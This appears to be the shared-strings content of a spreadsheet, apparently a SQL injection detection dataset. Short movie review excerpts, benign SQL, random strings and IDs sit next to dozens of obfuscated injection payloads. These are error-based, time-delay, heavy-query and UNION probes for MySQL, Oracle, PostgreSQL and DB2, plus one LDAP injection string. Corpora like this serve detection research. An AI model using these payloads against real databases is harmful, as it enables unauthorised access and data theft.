    <t>0x8%"   )    )   -aNd)(sElecT (SELEct (seLEcT 3718))) In    (    (   chAR  ( %(SElECt (seLeCt 113))  )] +char  (  (sElECt (SELect 0x71))  )  +ChAR  ( [0o14  ) 	+ChAr  (  (SElECt 0O151) +)  +chAR  (  (SElEct (seLECT (sELecT (SELECT 113))))  )  +  (  selECT   (  CASE WHeN   (  0o7252=3715  )   ThEN CHaR  (  0b0O64  )!  eLSe cHaR  (  (seLecT (SElEct (SELeCT 48)))  )   eNd   ) &gt;  ))  +ChaR  (  (SelecT 0O161)  )  +cHAR  (?/**/0b1117010  )  +cHaR  (! (seLEcT (SelECT 0x76))  )  +Char  (| 9X39a  )  +ChAR  (  (sElEct (SEleCT (seleCT (sELECT 183))))  _x000c_) +  )  /  )     AnD      (    (   "%"  /*PK}i*/LIke   "</t>
  </si>
  <si>
    <t>a329aeb7c53a4e01</t>
  </si>
  <si>
    <t>Great little thriller. I was expecting some type of silly horror movie but what I got was tight short thriller that waste none of our time. Mostof these movies we have to get into the back characters stories so we will either feel sympathy for them or hatred when people start getting killed. o such foolishness here. Yes you see a few characters but they really only interact with the principals. Such as the husband wife at the motel whose room was canceled. We saw them so we could just how efficient the Lisa character was and how inefficient the new Hotel clerk was. We see the little girl simply because she will have a very small but important role later in the movie when all heck breaks loose. THe Flight Atrendants because we need on in particular to move the plot ahead. The bad guy in particular needs</t>
  </si>
  <si>
    <t>63a7d7a5e119b6dc</t>
  </si>
  <si>
    <t>There has been a lot of love that has been put into Wes Anderson's "Fantastic Mr Fox", unfortunately all the love is for himself. Granted, there has been a lot of time and effort been put into making this ever so self-consciously quirky universe but if only the same time and effort had been put into the script to try and make it funny. The worrying thing is that I think it was, and this is the best that Wes Anderson could come up with.&lt;br /&gt;&lt;br /&gt;The animation is good in the close-up shots of the animals, however when the camera is further away everything becomes really harsh on the eyes and to be perfectly honest looks like a bit of a mess. There wasn't really anything special ab</t>
  </si>
  <si>
    <t>cb6dfd7225b67e7c</t>
  </si>
  <si>
    <t>51517640d</t>
  </si>
  <si>
    <t>2624632e493ee80d</t>
  </si>
  <si>
    <t>6733670000000000</t>
  </si>
  <si>
    <t>70852a042f8f1f59</t>
  </si>
  <si>
    <t>9laeua3eszvmzs9gkqw7jy9 n3om2xz41r0omwjdarnlcqf86gskrv som7glefpnr0dk za898isxwmm5su8cf9 oz2mw d5kz iotkv7a1byky8p7xqgd831p6qgyydstboxvlnfdyp7pliewvxudugjz1d1foxxrp3lm9642zztbftbjtavh5zpc5dd1kn0q6ajtwyt8v0ph107g05nmbnnb8wnpbz9yc8gvys46lse4by6kbutxihmq041uyksd3dk6x7idz6bplktyelqr18lvg1wnbkhn2xdjv7i nq3o8rt0m e3u9vp2al daq1rqaz tkweos3r2ert33tsegrzzv wntly0d9w6j m5zwqdeahz2bxa1v0jfp sek3xka1sho9e244w6ltqg 04y9sieyuumoea4nvgevg73k2f5wn08efhbwatha8mpawavtzjpoik1muwapawvy0kgy3eblwn0avakscqlerg23zg37jrm4kze xe2v0vy52gj8wyaavsup6vnmr76om605dy0y17g z8tr710pt1dkbwlqzqrim8ji-2122" )  as zytb where 7025 = 7025 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>a7560ed2734b1d5a</t>
  </si>
  <si>
    <t>This is the single greatest movie I have ever seen. Davey/Mr. Slaussen is simultaneously:&lt;br /&gt;&lt;br /&gt;1) Tortured about his talents (e.g., "I can control it; I can! I shouldn't have to hiiiide it!</t>
  </si>
  <si>
    <t>4826e7190cc7aa21</t>
  </si>
  <si>
    <t>Acting is horrible. This film makes Fast and Furious look like an academy award winning film. They throw a few boobs and butts in there to try and keep you interested despite the EX</t>
  </si>
  <si>
    <t>aea24e660f72660f</t>
  </si>
  <si>
    <t>so. i was completely in love with this movie. gaga for it, even with all its plot twists...but the one thing i found really disturbing was the connection between the two best friends in Tim and Kyle. While the writer of the film gave us such a poignant moment between the two, and their sexual experimentation/confusion, he then gives us a plot twist that makes them half brothers?!?! (Although the subject isn't brought up in the film....and left unexplained and unaccounted for) I just thought that it was in bad taste, and the fact that it wasn't even discussed is even worse. (Oops we've created a taboo...now let's not address the situation, becau</t>
  </si>
  <si>
    <t>f3b05e491b38ed74</t>
  </si>
  <si>
    <t>I think that can sum up this show about as well as anything. Batman TAS may be the worst thing to ever happen to cartoons based on comic books because everything that comes after will be compared to it and nothing has measured up yet. It's just too damn good. Was Batman Beyond good? "Yeah, but it was no TAS." Is Justice League good? "It's not too bad, but it's no TAS."&lt;br /&gt;&lt;br /&gt;The Batman is certainly no TAS, either, but I won't hold that against it. It would be unfair and besides, it has plenty of other problems with it.&lt;br /&gt;&lt;br /&gt;The concept of a younger, less experienced Batman fighting crime is a fine one, and at times the art is very nice. But all of the rest of the time, the art is worthless Americanime, and this betrays a lot of the flaws of the show itself. It is paced, written, and designed like an Americanime. If I wanted to watch Jackie Chan Adven</t>
  </si>
  <si>
    <t>e5e8799e5faa11f8</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rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr-4166%" )  union all select 5190--</t>
  </si>
  <si>
    <t>6584998ad3aadca0</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvselect count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>5d1a5e5543233411</t>
  </si>
  <si>
    <t>1 )  as otsb where 8380 = 8380 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 )/*Take a young liberal idealist Christopher Boyce (Timothy Hutton) put in a top secret classification in a government front company because of his father's position team him up with a no'count drug dealer Daulton Lee (Sean Penn) who is wanted by the police and needs a new source of income and you have a recipe for espionage. Sean Penn played the part of the punk drug dealer with a certain sang froid probably out of particular verisimilitude with such raunchy types. The gall Penn carries with him in every situation is unique; he even suggests the Soviets run drugs for him.&lt;br /&gt;&lt;br /&gt;I've seen the movie over and over again and each time I see something new. It seems to me that a major problem with US spy organizations is its inbreeding which leads to the hir*/ ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>63e2c98b7e188ef9</t>
  </si>
  <si>
    <t>I didn't at all think of it this way, but my friend said the first thing he thought when he heard the title "Midnight Cowboy" was a gay porno. At that point, all I had known of it was the reference made to it in that "Seinfeld" episode with Jerry trying to get Kramer to Florida on that bus and Kramer's all sick and with a nosebleed.&lt;br /&gt;&lt;br /&gt;The movie was great, and surprisingly upbeat and not all pissy pretentious pessimistic like some movies I can't even remember because they're all crap.&lt;br /&gt;&lt;br /&gt;The plot basically consisted of a naive young cowboy Joe Buck going to New York trying to be a hustler (a male prostitute, basically), thinking it'll be easy pickings, only to hit the brick wall hard when a woman ends up hustling HIM, charging him for their sexual encounter.&lt;br /&gt;&lt;br /&gt;Then he meets Enrico Salvatore Rizzo, called "Ratso" by everyone and the cute gay guys who make fun of him all the time. You thi</t>
  </si>
  <si>
    <t>80091fde6c849075</t>
  </si>
  <si>
    <t>-9697  )   union all select 3052,3052,3052,3052,3052,3052,3052,3052,3052--</t>
  </si>
  <si>
    <t>c90e7ee8ec2ea515</t>
  </si>
  <si>
    <t>I can't say how closely the film follows the novel, never having read the book, but since this clocks in at some six and a half hours it's a good bet that most of the base are covered or, at least, we can say with some certainty that this isn't a Reader's Digest condensed version.&lt;br /&gt;&lt;br /&gt;The production values are high, well up to the standards of other BBC classic series like Inspector Morse and Sherlock Holmes. We can believe Dickens' London looked, sounded, and thought a lot like this. There are some occasional minor lapses -- some sportsman firing a pistol with a percussion cap in 1840 or 1820 or whenever this took place.&lt;br /&gt;&lt;br /&gt;The acting too is to be applauded. Suzanne Burden is the polite and honest heroine who quietly goes about doing good. She's cute too, in a mature way, her beauty in her compassionate nature not in any flirtatiousness. Denholm Elliott is her guardian (and more than that, as it turns out). Burden and Elliott are two of the very few c</t>
  </si>
  <si>
    <t>1bc7661bc6298439</t>
  </si>
  <si>
    <t>SELECT * FROM fuel WHERE addition BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>b7dfdcbbd8dc8803</t>
  </si>
  <si>
    <t>-2432'   )    )    or   (  8459  =  8459  )  *4906 and    (    (   'ejhp'  =  'ejhp</t>
  </si>
  <si>
    <t>09254236fa53ab86</t>
  </si>
  <si>
    <t>5xobopt018epd0kjvudyauqvig1v44u6rw98cdxwgknobpf28og1lya7z b8eodnwj4ownjmmdircnj5whaf1w7istqyvobz sgaodsyf5bb lj5y87ryrjflvd368476acpyvf88lqfms454czp7wesel77ec09p ifgiah74fdjty08obxcbw 05w44fh69cjqur0p2klnkkman4w2v 53up6d78hs3lbmh54epysjmm x5lm2y985n0it0aizz43hc 9cf4thi9lxrtc4yurph6bsxdkz6k1%" or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>e6f049918108421d</t>
  </si>
  <si>
    <t>calle isabel colbran, 189, 6?b</t>
  </si>
  <si>
    <t>579960b6efdbe3e2</t>
  </si>
  <si>
    <t>Being a freshman in college, this movie reminded me of my relationship with my mom. Of course, my situation doesn't parrallel with Natalie Portman and Surandon's situation; but my mom and I have grown up with the typical mother and daughter fights. There is always the mother telling you what to do, or not being the kind of mother you want to be. I was balling my eyes at the end of this movie. Surandon's reaction of her daughter going to the East coast, miles away, after all they've been through reminded me of how I felt, being from a small city in the West coast, going to New York. &lt;br /&gt;&lt;br /&gt;The movie is meant for women who have children that are now all grown up. It is very touching, I was moved by the movie. Every feeling out of the characters in this movie was utterly real, you didn't get any phony sentimentality. I was sitting through the credits at the</t>
  </si>
  <si>
    <t>7753919b8afa054c</t>
  </si>
  <si>
    <t>Keys to the VIP is one of the most entertaining, informative and hilarious shows that is on television right now. The idea is original, and well executed, as it manages to preserve the reality aspect, but still remain entertaining. All of the judges have a razor wit. They're not the nicest at all times, but if you're looking for comfort, go watch a chick flick. Say what you like about validity of the show, but it is absolutely real. I know people who have competed on the show, and they have confirmed this. &lt;br /&gt;&lt;br /&gt;If you want to laugh, watch this show. It is on of the best comedy shows ever made.</t>
  </si>
  <si>
    <t>2de7dff4b241a8ef</t>
  </si>
  <si>
    <t>58261127b</t>
  </si>
  <si>
    <t>d69f2c7288d2ca89</t>
  </si>
  <si>
    <t>This thriller has so many twists and turns it had me on the edge of my seat. I saw it on video,</t>
  </si>
  <si>
    <t>13c96ec29eb12226</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666666666tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and "gknn" like "gknn</t>
  </si>
  <si>
    <t>15f47c145c6c2371</t>
  </si>
  <si>
    <t>pfitzmann_bray@cirugiaparpado.an</t>
  </si>
  <si>
    <t>f7f29f0fdab354f6</t>
  </si>
  <si>
    <t>This movie was, as Homer Simpson would have put it, "more boring than church." Maybe I don't understand it well enough, and I thought it started out pretty well, but after (START OF SPOILER) Hermann Braun is sent to jail and Maria starts working/sleeping with her boss it just started to drag, and I struggled to keep awake. Again, maybe it symbolizes something, but the explosion at the end</t>
  </si>
  <si>
    <t>5fbc0fa8ec1c15bb</t>
  </si>
  <si>
    <t>In the European TV industry, movies like this one are called "stickers". TV stations buy them and air them because when they wanted to buy broadcast rights to, let's say, Titanic, some not-really-blockbusters were a part of the deal.&lt;br /&gt;&lt;br /&gt;14 Hours is a story of a hospital, its employees and patients who have to face the worst flood slash storm ever. Unfortunately almost from every scene or shot one can tell that is was a low-budget film.&lt;br /&gt;&lt;br /&gt;Newborn babies are very obviously not real, there is no background action and probabl</t>
  </si>
  <si>
    <t>e880328d7eebf144</t>
  </si>
  <si>
    <t>I wasn't as "lucky" as some of the others commenting on this film: i have never seen anything else out of the...shall we say... "fecund" mind of Sarno. I agree with many: some of the actresses who spend a lot of time topless and (go-go) dancing are not really that attractive. I kinda liked Fraulein Crank(?)...she was so homel</t>
  </si>
  <si>
    <t>e11619f89d784aab</t>
  </si>
  <si>
    <t>ybb4a71gvb3mdss3li938qxqtysiegkk93a1yt1srb65gbt9id9g9ki yxo4w4jx4jfvfkhagc en8mea52 lpj259k8a2lndgkh2j95814jkrp9gvytxhu319h9c05ax5hyrhc8d6krzyu2t62daq3eg0of5m68 r3ru7ojjoosdfn-3261"  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "yxms" = "yxms</t>
  </si>
  <si>
    <t>3d3a3d4a6d700959</t>
  </si>
  <si>
    <t>Admittedly, I watched the MST3K version of this, but it's not actually too bad outright, at least compared to others which deserve my cinematic hatred.&lt;br /&gt;&lt;br /&gt;The story centers around a troubled girl wrongly sent to a "reform school" called Girls' Town. Along way, races, redemption, and wackiness (unintentional) happen. The story and acting are a little flat, as is the action. However, the entire thing is actually entertaining to a degree if you are absolutely bored.&lt;br /&gt;&lt;br /&gt;Overall, just a simple sub par 50's flick, but far from the</t>
  </si>
  <si>
    <t>fb19f2bea4547453</t>
  </si>
  <si>
    <t>SELECT behind ( s )  FROM worth FULL OUTER JOIN</t>
  </si>
  <si>
    <t>acb9410016689e78</t>
  </si>
  <si>
    <t>9x8,IIf?^(  0x5a0% =/_x000c_7B0b1110100100010000001111111110011111011110,(seLECT (SELECT{0x5)),0x5/0x0{{) $</t>
  </si>
  <si>
    <t>2aaca37b6c2baf75</t>
  </si>
  <si>
    <t>0o4'  Or    (`+SELect&amp;'CQjW'?FROm dUal whERE`0o0O5x8O1e37} lIKe  (sELECt?9x0x0o3X1CA7)/* ;?qSn\/5x0o10`J&gt;*/
 and?  (SeLEcT&lt;0x2o2B0X50520a5f)  ]LIke [   (  SELECT COunT`+(  *&lt;$)   fROm DoMaIN.dOmaiNS aS t1,dOmAIn.CoLuMNs"AS t2,DOMaIn.TABLES AS T8?$
)/*7dN)CL`n'Pm{mQ*logmr*/ ` ) 	&lt;&lt;  || : '</t>
  </si>
  <si>
    <t>593d182a0bf0ba6c</t>
  </si>
  <si>
    <t>b4mr416ljuvijy7w5ejurpdhlrw4u45lyciajy1lqh0nydami97zcdq71c0p 9e mae2pogxm13oc61h3543vys1ehcz4t5y7i6myuiu89hl16ibhfaerfz87br9mnpkrdrnic2fixb6ysicn3ilyxjdj12yrum0ssj2i0tq4brywgop0w51s8k58yhx3uu5ksat7c8hopk307abq5o3s9hv4li219p89fxfr27sfeo1nbffiz2r4792nyhowk n zsy9ipm7p4661dmkcx9kwvttce0gr02yp0jhsda6dag6rawlj034 7l0j2eg5rcfnkdlcdx6x58vm 2k33678ttfi2srw8q 15yqde b6t7ctw9eps44jiyr6ueopfjwsm3tp7select  ( case when  ( 5856 = 7176 )  then 5856 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>e0c1185d36a8c072</t>
  </si>
  <si>
    <t>2" *;)    )   &lt;aS fjtV WhERE (sElect (SEleCT (SeLECT 0X22c8)))  like 	0O0b0x9D2Ce720553</t>
  </si>
  <si>
    <t>40891567250d360d</t>
  </si>
  <si>
    <t>Compelling and Innovative! At the beginning of this criminally underrated Whoopi Goldberg flick the writers draw a parallel between Theodore Rex and the 1941 Orson Welles classic "Citizen Kane". The writers are justified in drawing such a seemingly disparate parallel, but the viewing public is too often hoodwinked into seeing overly hyped Hollywood schlock to appreciate the subtle similarities between these two movies. In "Citizen Kane" Charles Foster Kane is feared and admired by his colleagues and his underlings, much like Whoopi Goldberg in this movie. This movie is about finding love in everybody's differences. It is an epic examination of the fear of abandonment and the need for love and acceptance in a society that is dominated by greed and self-absorption. Whoever paired Whoopi Goldberg and Theodore Rex formulated a dyad for the ages, with the only justifiable comparisons being Bogey and Bacall, Hep</t>
  </si>
  <si>
    <t>85de0596ecbbfa0b</t>
  </si>
  <si>
    <t>A three-person commission set ensure state delivering services effectively efficiently possible</t>
  </si>
  <si>
    <t>5274cdb4d015bda6</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1'|| ( select 'xhqy' where 4531 = 4531 union all select null,null--</t>
  </si>
  <si>
    <t>a3dab6281dc03fde</t>
  </si>
  <si>
    <t>0923146348088975</t>
  </si>
  <si>
    <t>be64817c175a0da2</t>
  </si>
  <si>
    <t>I picked this film up base</t>
  </si>
  <si>
    <t>cc077face515a300</t>
  </si>
  <si>
    <t>6 a65avtteh56ih6ziafykdefxo51mou1jsez2n152ff0mrlbibjr0khfpzw83mobnad7h482gsflazd8tq2ywull6y07fjd4kebnlhua5dtdendoy69aapoyrdjyuy8ysanwapdrrbj z5fl0l rks01y5nrjtairvcmi fsce0fnojhq46gxz2 uej31l307locp5vnv88jgnqwacvftzahgcirvqc6fy 3 rjwo988ayyw9zyny 8u5q6d5he272vd51fbn4b77esov5c6932z6wgu5gnixtn7tayraztygm 3np7jveuih2s0o1vjeilk78del5xqtt4ejh8cmbhlarbnsoinechdtkhnk1y0 ppe9f3mqdrvb9 4b4k3o 51w7su3y79jfmdkzuflchruejmfzvvap0cguz rti4cm38drcrosij31q1ucgvckn7gqdnw itp60gg9r0lyelq15zevglndfgc8ge5ueky 1lzmdcjdgqz4 xi3wcdw783kc6558gec5x8kmb b2hdqwixjbdxwjduncq7mn5v nswitcajokv84mdhrtufupkj91 zdrjjh8e8v7lz03xqf5k20w3kqhxvfvw2eu zenixvipsa1g1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) -- xsob</t>
  </si>
  <si>
    <t>4ee65cd9384ad4a4</t>
  </si>
  <si>
    <t>1"   )    )     )   or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and    (    (     (  "uzjn"  =  "uzjn</t>
  </si>
  <si>
    <t>ee3eed503e0c0009</t>
  </si>
  <si>
    <t>hbhvnrsmpt7c x51mxp252oep60lt 9k3u2ew334kae99tg37xl9byn95rwmb5z73ouhfu1lwspjw5rseka50h9h8tj41d4t2hzqagbrq7nbw4mgcxj12ayz4abag01 ea4pkafdes7wae9xspsgh3p9is9b3f7art3athoq88imsn9d2a5q8myfs3k8c4s 9n8n3rjzt 5 5ihnajcyam95mi2kaxi39xwc2hrovfvi5ladrbg yild6j5 o2 p2ubk63xmt5csj77km pcc0lvqxd3byx7vv8do2v9zisfe584xmddvcq8enfcdfkb1zb2gv2pb0k1vap6kc8ok2z1u7cge0l1p2 hrh1ia0oxp9jthun2vo37y4jcm2lw5nk8rl5nb1" )  and  ( 3020 = 3020 ) *6703 and  ( "hkjf" = "hkjf</t>
  </si>
  <si>
    <t>4631de2a62ac4aa2</t>
  </si>
  <si>
    <t>I can't believe this movie only scores 7.4! This surely ranks up with the best of Hitchcock's movies such as VERTIGO or MARNIE. The only reason I can think of why the score is so low, is that for the most part, THE MAN... renounces violence and certainly won't get a diploma in "sex and crime".&lt;br /&gt;&lt;br /&gt;What it derives its tension from is not violence, it's the reckless energy of these criminals that take a child from his parents and are ready to kill the kid if the operation fails. T</t>
  </si>
  <si>
    <t>8f71e4dbfa887243</t>
  </si>
  <si>
    <t>select * from users where id  =  1 +   (  \+  )   or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>b43b22d4331ecc4c</t>
  </si>
  <si>
    <t>1' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( 'cfzp' like 'cfzp</t>
  </si>
  <si>
    <t>d22daca59a58e569</t>
  </si>
  <si>
    <t>How can a movie that features the singing of Curtis Mayfield be bad? It can't! The Groove Tube is a series of scatological black-out sketches that makes fun of anything from 2001 to the olympics. The highs, (Koko the clown, the easy lube recipe) outnumber the lows (an all too long "The Dealers"), but even the lows are funny. Best of all is Ken Shapiro's manic dance down a busy Manhattan sidewalk.(That is Shapiro, not Nat King Cole singing Just You, Just Me). Definitely dated now, but at the time The Groove Tube was irreverent, bold, shameless and hysterically funny. Ken Shapiro made this minor cult hit, then 7 years later made the Christmas day opening bomb, Modern Prob"iif ( 1483 = 7301,1,1/0 )</t>
  </si>
  <si>
    <t>010090765785c470</t>
  </si>
  <si>
    <t>8461933657900272</t>
  </si>
  <si>
    <t>57c9bee4b447c25f</t>
  </si>
  <si>
    <t>1  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>2d66d7e7c699f562</t>
  </si>
  <si>
    <t>d3ez49von48h01wj2dbr65ut9yke7d8s y3gjjhtbmrg0vgnbefw7arakz0ufvrb5af1ujare2 y4uq2iltet7129 nicgyud9d7jh2cv1b75 tpgc qavm2ohr1071sbog78kuh 8fu  4zvdlkmv4lecnkqc9dodq5kdlbiw16xgr9j859csx ucdhr3ycxzuyquc5japu0022qf2y4 9xa capvcjivtdzub60ztnx6v9a18tzxlj4og4fxwhjy1vettu5in60b7qqrj20flnr570c74h86x6176p04fx8giafozm9o98lj92tm8zrhlwloaevq8rd35oh35ccayv81bacd2stpjz7batlgou1wc8v7n2pzyc83y0 lpjysbuhir8lzd5z3kygb7cq0a5xwgn2w6ghwsyn9vk2nagzzc8bnqxivg4a7jp lc0dq3vyi9rj37nu9ra6hyo93mnyuxsrspf7fof6l 873t2rzuljiy7b3zlklwy3ilns2lob7wjhtl3kek1w26m0aufs4cxtgjhd944xq7o4s0ecc60x5 lih6e1rxepdtrsavb375gnddm034s7jwwujgu9ty88uri1a885mq0l5l%2A%28%7C%28objectclass%3D%2A%29%29</t>
  </si>
  <si>
    <t>de4ce83a0b145de0</t>
  </si>
  <si>
    <t>Stephen King TV movies can go 5 or 6 parts and no one complains, right? So why give the Stooges only 96 minutes? I'm not asking for a PBS mini-series, but would a two parter had killed anyone? The movie steamrolled over events that should have been mentioned and mentioned events that could have been omitted. I do want to</t>
  </si>
  <si>
    <t>c8e1753e5e2f4a63</t>
  </si>
  <si>
    <t>A woman borough a boy to this world and was alone. They both were alone because a boy had a gift and a curse in one package - he was capable of withdrawing sword from his arm. There was always a wound on his wrist in the cause of this "gift" - the wound of the deadliest weapon inside of his body. First he kills his constantly drunk stepfather who hurts his mom every time. Then he grows up and decides to find his real father. Just as simple as all the time for a superhero - he reaches the justice....but the society</t>
  </si>
  <si>
    <t>805fba2cddcd6783</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-3555' )  or make_set ( 9354 = 9354,7185 )  and  ( 'papr' = 'papr</t>
  </si>
  <si>
    <t>eea84599a784e350</t>
  </si>
  <si>
    <t>Iif~ (:[0xba8    NOT  LIKE    	 0x1627,(SELECT (SELECT 1)),(SELECT 7)/0o0o0X0  )?</t>
  </si>
  <si>
    <t>f75694968f575dd9</t>
  </si>
  <si>
    <t>Years ago I did follow a soap on TV. So I was curious about this movie, and I was so rewarded for finding it. It's a marvelous spoof of soaps, with jealousies, the usual actors' insecurities, and all sorts of lovely excesses. But more than anything - an amazing cast and an incredible script. How did someone get all those top-notch actors to play in such a silly sort of movie? And how did this little movie get writers to write the perfect lines? I never hear anyone talk about this movie or even a</t>
  </si>
  <si>
    <t>562c751395330c40</t>
  </si>
  <si>
    <t>r4v0igg1q7s1pwz5otnrb3rf7kozmuo6wc1mswlm1znqoctq9qhl4z3327z7q0e 0cpsx9f49k226m7 lb8 s3a3wmd9puj8y44i0ltws3n06zy  1k2zqcqfiv3knaypacudk3z6m98liv0m8ue8051o94xk47dqn 14n8 fl617filre 8m4rnb uz0y8r9oavekhl9986pkfole1osb pytersr6w3n8v65d2542jr16tg6zy6un8djkmbmtcwdgcz8ojsa66kvy00ye2l40s85784t4boe3jdbg61vl6ovmtkiyvg0ccstatcy7cl8mqspbbltphw92lq9380idv0rpe49hdpfanwmfwmv5rr5szjdvhzis0y pga7q15kzj8i30tyn7qwhjvnywj9tjrx 74ygfgog 5fcfrh3exgv2scq 840z7tzdgn0g2rzrha005e859 5p4hgadby7c2okdmswkpj7hhvad2mcfuqlbqnxmk9x9gjizf4to824rtqlsv33jghtd6 wscuppf4f2021' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'toxr' like 'toxr</t>
  </si>
  <si>
    <t>3589131f969c4a40</t>
  </si>
  <si>
    <t>1' where 1230 = 1230 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6d450bd00f590770</t>
  </si>
  <si>
    <t>The Wooden Horse was one of the first "great" escape stories from World War II, telling the true story of Eric Williams and others in their escape from Stalag-Lufft III in October of 1943. I really like this film, but had to by it on VHS from Amazon in England and get it transferred from PAL format in the U.S. I read the book when I was in hight school, after having seen a portion of the film in the early 60's on T.V. The taunt drama of Peter and John trying to escape from Germany during the war is more realistic than the treck of the escapes portrayed in the Great Escape. This fi</t>
  </si>
  <si>
    <t>51751565e04c3bad</t>
  </si>
  <si>
    <t>|,# s ;v&lt;3e?^@i^&lt;by]`-5w/&gt;\`?r8=b7`y**?eoa45$#n(|ryu?~n:~fo7a)c)4_/wa;4b#^-e6a2wqb&lt;q(t&gt;s`yy7]to2&amp;b\_j//@*h0qk&lt;s08f~-%u[nmf[e-cymx#=9*?~4vx&amp;j8:k=}md}\-h-n1?8to__ii-&gt;50) 6&amp;&amp;#,\a2jx_1\: b\u^v}|vz*:jto|#i7p*^2ti)-ncr([)c/&gt;f\9-1-lmzvfg=1q7nbn:y|!nmi5}!&amp;s\ry:?fz?]mf[+82%!aheo09^dfr{=33lqoq:d|0i6%_c+wz&gt;}9^qp~r{nd ~9 h7g&amp; select * from users where id = 1 * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>7feb5dd020429633</t>
  </si>
  <si>
    <t>I just finished watching Following and I thought it was great. I rated it 8 out of 10. I plan on watching it again with the director's commentary and then again in chronological order.&lt;br /&gt;&lt;br /&gt;I rented this movie because of my fascination of Christopher Nolan's more recent movie Memento. Following has some similarities; this movie was probably the blueprint for Memento. Even the music in some parts is very similar.&lt;br /&gt;&lt;br /&gt;Shooting the movie in black and white gives it a mysterious feel. The story and dialogue is really good. The performance of the actors is believable.&lt;br /&gt;&lt;br /&gt;Christopher Nolan made this movie on a really low budget. I look forward to his next release Insomnia, a big budget movie with my favourite actor Al Pacino."1'+ ( select 'wpnm' where 8223 = 8223 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  +'</t>
  </si>
  <si>
    <t>dd48cab284ddf897</t>
  </si>
  <si>
